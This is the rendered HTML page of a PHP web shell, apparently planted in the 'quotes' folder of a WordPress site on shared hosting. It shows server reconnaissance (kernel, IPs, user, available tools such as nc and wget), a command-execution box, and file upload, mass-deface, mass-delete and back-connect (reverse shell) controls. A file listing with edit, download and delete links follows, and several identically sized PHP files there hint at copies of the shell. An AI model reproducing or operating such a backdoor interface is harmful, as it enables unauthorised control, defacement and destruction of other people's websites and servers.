 <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"> <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/> <title>SEC [ quotes.c3park.com ]</title> <link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono" rel="stylesheet"> <style type="text/css"> * { font-family: Ubuntu Mono; } a { text-decoration: none; color: white; } a:hover { color: white; } /* width */ ::-webkit-scrollbar { width: 7px; height: 7px; } /* Handle */ ::-webkit-scrollbar-thumb { background: grey; border-radius: 7px; } /* Track */ ::-webkit-scrollbar-track { box-shadow: inset 0 0 7px grey; border-radius: 7px; } .td-break { word-break: break-all } </style> </head> <body class="bg-dark text-light"> <div class="container-fluid"> <div class="py-3" id="main"> <div class="p-4 rounded-3"> <table class="table table-borderless text-light"> <tr> <td><i class="fa fa-server"></i>&ensp;Linux box5601.bluehost.com 5.14.0-611.47.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 8 20:00:39 EDT 2026 x86_64</td> </tr> <tr> <td><i class="fa fa-microchip"></i>&ensp;Apache</td> </tr> <tr> <td><i class="fa fa-satellite-dish"></i>&ensp;162.241.218.241&ensp;|&ensp;Your IP: 142.250.33.38</td> </tr> <tr> <td><i class="fa fa-fingerprint"></i>&ensp;Cant read [ /etc/named.conf ]</td> </tr> <tr> <td><i class="fas fa-cog"></i>&nbsp;[&nbsp;<font color="lime">drwxr-x---</font>&nbsp;]</td> </tr> <tr> <td> <i class="fa fa fa-folder pt-1"></i>&ensp;  <a href="?dir=/" class="text-decoration-none text-light">/</a>  <a href="?dir=/home2" class="text-decoration-none text-light">home2</a> <span class="text-light"> /</span>  <a href="?dir=/home2/happyhe6" class="text-decoration-none text-light">happyhe6</a> <span class="text-light"> /</span>  <a href="?dir=/home2/happyhe6/public_html" class="text-decoration-none text-light">public_html</a> <span class="text-light"> /</span>  <a href="?dir=/home2/happyhe6/public_html/quotes" class="text-decoration-none text-light">quotes</a> <span class="text-light"> /</span>  </td> </tr> </table> <form action="" method="post" class="row g-2 p-2"> <div class="col-auto"><input type="text" class="form-control form-control-sm" name="bdcmd" placeholder="whoami"></div> <div class="col-auto"> <button type="submit" class="btn btn-outline-light btn-sm">Submit</button> </div> </form> <div id="tool"> <center> <hr width='20%'> </center> <div class="d-flex justify-content-center flex-wrap my-3"><a href="?" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-home"></i> Home</a> <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a> <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#massDef" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-layer-group"></i> Mass Deface</a> <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#massDel" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-eraser"></i> Mass Delete</a> <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#backConnect" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-network-wired"></i> Back Connect</a> <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#info" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-info-circle"></i> Info Server</a></div> <center> <hr width='20%'> </center> <div class="container" id="tool"> <div class="row"> <div class="col-md-12"> <div class="collapse" id="upload" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post" enctype="multipart/form-data"> <div class="mb-3"><label class="form-label">File Uploader</label> <div class="input-group"><input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload" multiple> <button class="btn btn-outline-light" type="submit" id="inputGroupFileAddon04">Upload </button> </div> </div> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="newFileCollapse" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"><label class="form-label">File Name</label> <input type="text" class="form-control" name="newFileName" placeholder="test.php"></div> <div class="mb-3"><label class="form-label">File Content</label> <textarea class="form-control" rows="10" name="newFileContent" placeholder="Hello-World"></textarea></div> <button type="submit" class="btn btn-outline-light">Create</button> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="newFolderCollapse" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"><label class="form-label">Folder Name</label> <input type="text" class="form-control" name="newFolderName" placeholder="home"></div> <button type="submit" class="btn btn-outline-light">Create</button> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="massDef" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"><label class="form-label">Directory</label> <input type="text" class="form-control" name="massDefDir" value="/home2/happyhe6/public_html/quotes"></div> <div class="mb-3"><label class="form-label">File Name</label> <input type="text" class="form-control" name="massDefName" placeholder="test.php"></div> <div class="mb-3"><label class="form-label">File Content</label> <textarea class="form-control" name="massDefContent" rows="5" placeholder="Hello World"></textarea></div> <button class="btn btn-outline-light" type="submit">Submit</button> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="massDel" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"><label class="form-label">Directory</label> <input type="text" class="form-control" name="massDel" value="/home2/happyhe6/public_html/quotes"></div> <div class="mb-3"><label class="form-label">File Name</label> <input type="text" class="form-control" name="massDelName" placeholder="test.php"></div> <button class="btn btn-outline-light" type="submit">Submit</button> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="backConnect" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"><label class="form-label">Ip</label> <input type="text" class="form-control" name="ip" placeholder="127.0.0.0" required> </div> <div class="mb-3"><label class="form-label">Port</label> <input type="text" class="form-control" name="port" placeholder="1337" required> </div> <button class="btn btn-outline-light" type="submit">Submit</button> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="info" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-8"> <div class="mb-3"><label class="form-label">Server Info</label> <table class="table text-light"> <tr> <td>Operating System</td> <td>:</td> <td>Linux box5601.bluehost.com 5.14.0-611.47.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 8 20:00:39 EDT 2026 x86_64</td> </tr> <tr> <td>User / Group</td> <td>:</td> <td>1905[happyhe6] / 1905[happyhe6]</td> </tr> <tr> <td>PHP Version</td> <td>:</td> <td>8.3.32</td> </tr> <tr> <td>IP Server</td> <td>:</td> <td>162.241.218.241</td> </tr> <tr> <td>Your IP</td> <td>:</td> <td>142.250.33.38</td> </tr> <tr> <td>Storage</td> <td>:</td> <td class="td-break">Total = 1.48 TB, Free = 373.19 GB [24%] </td> </tr> <tr> <td>Domains</td> <td>:</td> <td>Cant read [ /etc/named.conf ]</td> </tr> <tr> <td>Software</td> <td>:</td> <td>Apache</td> </tr> <tr> <td>Disable Functions</td> <td>:</td> <td class="td-break"><font class='text-success'>All function is accessible</font></td> </tr> <tr> <td>Useful Functions</td> <td>:</td> <td>gcc, lcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip, bzialfa2, nc, locate, suidperl, git, docker, ssh</td> </tr> <tr> <td>Downloader</td> <td>:</td> <td>wget, fetch, lynx, links, curl, get, lwp-mirror</td> </tr> <tr> <td colspan="3">CURL : <font class="text-success">ON</font> | SSH2 : <font class="text-danger">OFF</font> | Magic Quotes : <font class="text-danger">OFF</font> | MySQL : <font class="text-success">ON</font> | MSSQL : <font class="text-danger">OFF</font> | PostgreSQL : <font class="text-success">ON</font> | Oracle : <font class="text-danger">OFF</font></td> </tr> <tr> <td colspan="3">Safe Mode : <font class="text-danger">OFF</font> | Open Basedir : <font class="text-warning">NONE</font> | Safe Mode Exec Dir : <font class="text-warning">NONE</font> | Safe Mode Include Dir : <font class="text-warning">NONE</font></td> </tr> </table> </div> </div> </div> </div> </div> </div> </div> </div> <div class="container"> <!-- menu start -->  <!-- mass deface -->  <!-- mass delete -->  <!-- back connect -->  <!-- downloads -->  <!-- action menu -->  </div> <div class="table-responsive"> <table class="table table-hover table-dark align-middle text-light"> <thead class="align-middle"> <tr> <td style="width:35%">Name</td> <td style="width:10%">Type</td> <td style="width:10%">Size</td> <td style="width:13%">Owner/Group</td> <td style="width:10%">Permission</td> <td style="width:13%">Last Modified</td> <td style="width:9%">Actions</td> </tr> </thead> <tbody class="text-nowrap">  <tr> <td>  <a href="?dir=/home2/happyhe6/public_html/quotes" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> .</a>  </td> <td class="text-light">dir</td> <td class="text-light">-</td> <td class="text-light">happyhe6/nobody</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=.&action=chmod"><font color="lime">drwxr-x---</a> </td> <td class="text-light">2026-07-27 06:56:46</td> <td>  <div class="btn-group"><a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New Folder"><i class="fa fa-folder-plus"></i></a> <a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New File"><i class="fa fa-file-plus"></i></a> </div>  </td> </tr>  <tr> <td>  <a href="?dir=/home2/happyhe6/public_html" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> .. </a>  </td> <td class="text-light">dir</td> <td class="text-light">-</td> <td class="text-light">happyhe6/nobody</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=..&action=chmod"><font color="lime">drwxr-x---</a> </td> <td class="text-light">2026-07-23 02:14:14</td> <td>  </td> </tr>  <tr> <td>  <a href="?dir=/home2/happyhe6/public_html/quotes/.well-known" class="text-decoration-none text-light"><i class="fa fa-folder"></i> .well-known</a>  </td> <td class="text-light">dir</td> <td class="text-light">-</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=.well-known&action=chmod"><font color="lime">drwxr-xr-x</a> </td> <td class="text-light">2026-06-18 04:28:09</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=.well-known&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=.well-known&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td>  <a href="?dir=/home2/happyhe6/public_html/quotes/images" class="text-decoration-none text-light"><i class="fa fa-folder"></i> images</a>  </td> <td class="text-light">dir</td> <td class="text-light">-</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=images&action=chmod"><font color="lime">drwxr-xr-x</a> </td> <td class="text-light">2026-07-20 06:06:38</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=images&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=images&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td>  <a href="?dir=/home2/happyhe6/public_html/quotes/wp-admin" class="text-decoration-none text-light"><i class="fa fa-folder"></i> wp-admin</a>  </td> <td class="text-light">dir</td> <td class="text-light">-</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-admin&action=chmod"><font color="lime">drwxr-xr-x</a> </td> <td class="text-light">2026-07-17 12:48:32</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-admin&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-admin&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td>  <a href="?dir=/home2/happyhe6/public_html/quotes/wp-content" class="text-decoration-none text-light"><i class="fa fa-folder"></i> wp-content</a>  </td> <td class="text-light">dir</td> <td class="text-light">-</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-content&action=chmod"><font color="lime">drwxr-xr-x</a> </td> <td class="text-light">2026-07-17 10:07:55</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-content&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-content&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td>  <a href="?dir=/home2/happyhe6/public_html/quotes/wp-includes" class="text-decoration-none text-light"><i class="fa fa-folder"></i> wp-includes</a>  </td> <td class="text-light">dir</td> <td class="text-light">-</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-includes&action=chmod"><font color="lime">drwxr-xr-x</a> </td> <td class="text-light">2026-05-21 03:12:59</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-includes&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-includes&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>   <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=.htaccess&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> .htaccess </a></td> <td class="text-light">text/plain</td> <td class="text-light">2 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=.htaccess&action=chmod">-r--r--r-- </td> <td class="text-light">2026-07-20 06:06:36</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=.htaccess&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=.htaccess&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=.htaccess&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=.htaccess&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=about.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> about.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">6.27 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=about.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-27 04:30:26</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=about.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=about.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=about.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=about.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=error_log&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> error_log </a></td> <td class="text-light">text/plain</td> <td class="text-light">11.95 MB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=error_log&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-28 05:07:33</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=error_log&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=error_log&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=error_log&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=error_log&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=filefuns.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> filefuns.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">5.52 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=filefuns.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-20 05:50:42</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=filefuns.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=filefuns.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=filefuns.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=filefuns.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=index.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> index.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">19.98 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=index.php&action=chmod">-r--r--r-- </td> <td class="text-light">2026-07-20 06:06:35</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=index.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=index.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=index.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=index.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=inputs.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> inputs.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">6.27 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=inputs.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-25 07:57:43</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=inputs.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=inputs.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=inputs.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=inputs.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=license.txt&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> license.txt </a></td> <td class="text-light">text/plain</td> <td class="text-light">19.44 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=license.txt&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-05-21 03:12:58</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=license.txt&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=license.txt&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=license.txt&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=license.txt&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=mah.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> mah.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">6.27 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=mah.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-25 06:30:40</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=mah.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=mah.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=mah.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=mah.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=pages.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> pages.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">6.27 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=pages.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-27 06:56:57</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=pages.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=pages.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=pages.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=pages.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=radio.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> radio.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">6.27 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=radio.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-21 06:46:12</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=radio.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=radio.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=radio.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=radio.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=readme.html&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> readme.html </a></td> <td class="text-light">text/html</td> <td class="text-light">7.23 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=readme.html&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-10 04:19:59</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=readme.html&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=readme.html&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=readme.html&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=readme.html&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  